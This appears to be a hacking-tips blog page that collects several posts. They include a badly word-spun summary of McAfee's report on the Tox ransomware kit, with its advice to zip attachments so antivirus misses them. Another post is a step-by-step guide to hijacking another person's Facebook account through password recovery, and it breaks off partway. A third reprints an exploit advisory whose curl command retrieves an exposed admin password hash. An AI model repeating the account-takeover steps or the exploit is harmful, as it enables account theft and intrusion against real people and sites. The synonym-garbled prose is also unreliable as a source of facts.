Slide 1 Slide 2 Slide 3 Slide 4 Slide 5
Showing posts with label System. Show all posts
By Unknown | 0 comment

McAfee found in the Deep Web a ransomware-development packs that enable simple to assemble malware in only 3 stages, actualizing a fascinating model of offer.
In the criminal underground it is anything but difficult to discover malware-development units that enable simple to assemble malevolent code from existing formats and in same cases beginning from true blue applications. Another pattern risen up out of examination by specialists at McAfee is a kind of simple to utilize Ransomware manufacturer, this group of malware is winding up plainly significantly more well known in the criminal biological system and law breakers are attempting to catch this open door.

The ransomware-development units, named Tox, is accessible online for nothing in the Dark Web since May 19. The onion address of the site that offer it is

"We built up an infection which, once opened in a Windows OS, encodes every one of the records. When this procedure is finished, it shows a message making a request to pay a payoff to a bitcoin deliver to open the records. " states the introduction of Tox accessible on the landing page.

A client inspired by Tox can subscribe the administration to make their own infection. The creators clarify that it is very simple to make a ransomware in a couple of straightforward strides:

Choose the payment sum.

Enter your "cause."


Present the captcha


The makers of Tox ask for a rate of the sum paid as payoff by the casualties, they guarantee the secrecy of installments and malware exchange through Bitcoin and Tor organize. The creators of Tox guarantee that the discovery rate for the infections produced by the stage is low.

"When you have downloaded your infection, you need to taint individuals (yes, you can spam a similar infection to more individuals). How? That is your part. The most widely recognized practice to spam it as a mail connection. On the off chance that you choose to take after this technique make sure to compress the record to avoid antivirus and antispam identification." is accounted for on the official site.

"The most critical part: the bitcoin paid by the casualty will be credited to your record. We will simply keep a 30% charge of the wage, so on the off chance that you determine a 100$ payment, you will get 70$ and we'll get 30$, isn't this reasonable?"

The key component for Tox are:

Tox is free. You simply need to enroll on the site.

Tox is reliant on TOR and Bitcoin. That takes into consideration some level of obscurity.

The malware acts as publicized.

Out of the entryway, the standard of antimalware avoidance is genuinely high, which means the malware's objectives would require extra controls set up (HIPS, whitelisting, sandboxing) to get or anticipate this.antimalware avoidance is genuinely high, which means the malware's objectives would require extra controls set up (HIPS, whitelisting, sandboxing) to get or keep this.

The wrongdoing as-an administration show actualized by Tox creator is basic as powerful, the malware manufacturer produces an executable of around 2MB that is veiled as a .scr record.
Tox endorsers can disseminate it as they lean toward while the Tox shrouded administration will track any establishment and related benefit. Tox clients will get their assets specifically on the Bitcoin address they gave amid the membership stage.

"Upon execution, the malware scrambles the casualties' information and prompts them for the payoff, including the Bitcoin address for sending installment." states McAfee.

The master at McAfee clarified that the malware seems to need multifaceted nature and productivity in light of the fact that the designer has left a few recognizing strings inside the code.

"Tox-created malware is ordered in MinGW and utilizations AES to scramble customer records by means of the Crypto++ library. The Microsoft CryptoAPI is utilized for key era."

Tox infection initially downloads the fundamental segments to work, Curl and the TOR customer.

The specialists highlighted that numerous other risk on-screen characters will receive this model of offer, they additionally expect that malware creators will enhance avoidance capacities of their noxious operators and will utilize encryption to ensure malware activity.
Read more...
By Unknown | 0 comment

Follow These Two Steps To Make A Facebook Page Without Name :



1- Mark, Copy and Name Your Page To
2- Mark, Copy and ReName Your Page To


Video Tutorial 


Read more...
By Unknown | 0 comment

Before you start: The information given below is the traditional method of locking any Facebook account and you are most likely to know this before. It might not be exactly Hacking! You can call me a Script Kiddie! I don’t mind. There are no guarantees that you can hack into every account through the given methods. This is not for those professional techies or hackers :)
Privacy and Networking are two big reasons why Facebook is such a hit. If there is a possibility to lock your friend’s Facebook account for a day and even access their account, then there’s lot more involved than just fun.
The method involves Comprising a Facebook Account through Security Questions and Sending codes to Three Selected Friends, the latter being more complex and more unknown to people.
Everyone might know the security question thing before. But the fact is that they might have tried this on Gmail and Yahoo but not on Facebook.
Here’s how you go about on Facebook:


Step 1: Create a “Fake” Email ID in Gmail or Yahoo with either the victim name or some other random name. [It depends on your requirements]. This is the very basic step.

Step 2: Identify the Facebook Account you want to hack. Go to their Profile Page. In the address bar, you can see the Profile URL of the target user. Just copy the entire Profile URL from the address bar.

Step 3: Open another browser, go to Facebook.com. Select the Forgot Password option. - See more at: http://www.techgadgetsweb.com/6622/to-hack-facebook-accounts-traditional/comment-

Step 4: Identify your Account Window opens now. Facebook gives three options to identify your account.
A. Enter your Email or Phone Number: This is very straight forward. If you know the Email ID or the Mobile Number associated with the victim’s account, enter it here. But skip this one.
B. Enter your Facebook username: This is where you are going to paste the profile URL that you copied in Step 2.
C. Enter your Name and a Friend’s Name: Here, you are required to enter the exact name that your victim uses for their profile and also one of their friend’s accounts. Skip this one too.
We are going to follow the B option which is guaranteed to work every time with any profile. After pasting the victim profile URL in B, make sure to remove the www and also the “s” from https. Facebook gives an example for that in that box itself.

Read more...
By Unknown | 0 comment



Exploit:Adult Webmaster PHP - Password Disclosure
Author: vinicius777
Email/Twitter: vinicius777 [AT] gmail  @vinicius777_
Vendor Homepage: http://sourceforge.net/projects/adultweb/


Administrative Credential Disclosure

PoC:
 
root@kali:/# curl http://localhost/home/caspers/public_html/demo/admin/userpwdadfasdfre.txt

admin:3a4ebf16a4795ad258e5408bae7be341


Vulnerable Code:
admin/common.php

// Check user existance
$pfile = fopen("userpwdadfasdfre.txt","a+");
rewind($pfile);

while (!feof($pfile)) {
$line = fgets($pfile);
$tmp = explode(':', $line);
if ($tmp[0] == $user) {
$errorText = "The selected user name is taken!";
break;
}
}

// If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1);

fwrite($pfile, "\r\n$user:$userpass");
}

fclose($pfile);

Read more...
By Unknown | 0 comment

1.)Open this link : https://www.facebook.com/me/photos_albums
After that open your "Profile Pictures" Album , click any picture you want to use as nother profile picture for your facebook profile 


2.)After you clicked on the picture that you want to use as another profile picture in step "1" , look at the url and copy the "fbid" value , mine here is : 10151822490798885

3.)Go to your facebook account , click your profile picture and choose "Edit Thumbnail" .
a pop up window will appear .

4.)Right click on your profile picture and choose "Inspect element" .
5.)Scroll down until you reach the code which start with : 
Click the left small arrow to open the code .
scroll down a bit until you find this code : 
102714738884
">


Here we need to change the input field named "photo_fbid" value which is equal to : 102714738884 in the above code ,
notice that the value 102714738884 will not be the same as your code is .

Double click on the value to edit it , or right click and choose edit html , paste the fbid value that you copied in step "2" above . 

6.) Click any where to save the changed , close the "Inspect element" window , 
Finally click "Save" . 







Read more...
By Unknown | 0 comment





Thanks To Anil Vishwakarma
Read more...